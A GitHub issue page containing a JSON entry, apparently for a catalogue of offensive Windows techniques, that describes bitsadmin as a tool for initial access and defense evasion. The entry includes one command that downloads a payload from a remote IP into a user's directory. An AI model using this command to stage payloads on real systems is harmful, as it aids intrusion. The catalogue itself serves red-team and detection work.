We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
{ "id": "71f7a06f-0587-44f3-a78f-80ad2a3b0f36", "name": "Bitsadmin", "phases": ["Initial Access", "Bypassing Defenses"], "category": "Windows Utility", "stealthy": false, "platforms": ["Windows"], "source": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin", "description": "Bitsadmin is a command-line tool in Windows used to create and monitor download or upload jobs and manage the Background Intelligent Transfer Service (BITS).", "undetected": [], "detected": [], "commands": [ { "id": "b54896cb-57a8-42b3-bbcd-370e5cf77e7e", "name": "Download base64 encoded Payload", "description": "Download a payload.", "tag": "BITS:JOB_COMPLETE", "results": ["BITS:JOB_COMPLETED"], "cmd": "bitsadmin /Transfer myJob http://192.168.10.10/file.txt C:\\Users\\user\\enc.txt", "requirements": { "and": [ { "tag": "BITS" }, { "tag": "AUTHENTICATION" } ] } } ], "latest_commit": "", "language": "Windows Command Line" }
The text was updated successfully, but these errors were encountered:
8a1de05
Patrick-DE
No branches or pull requests
The text was updated successfully, but these errors were encountered: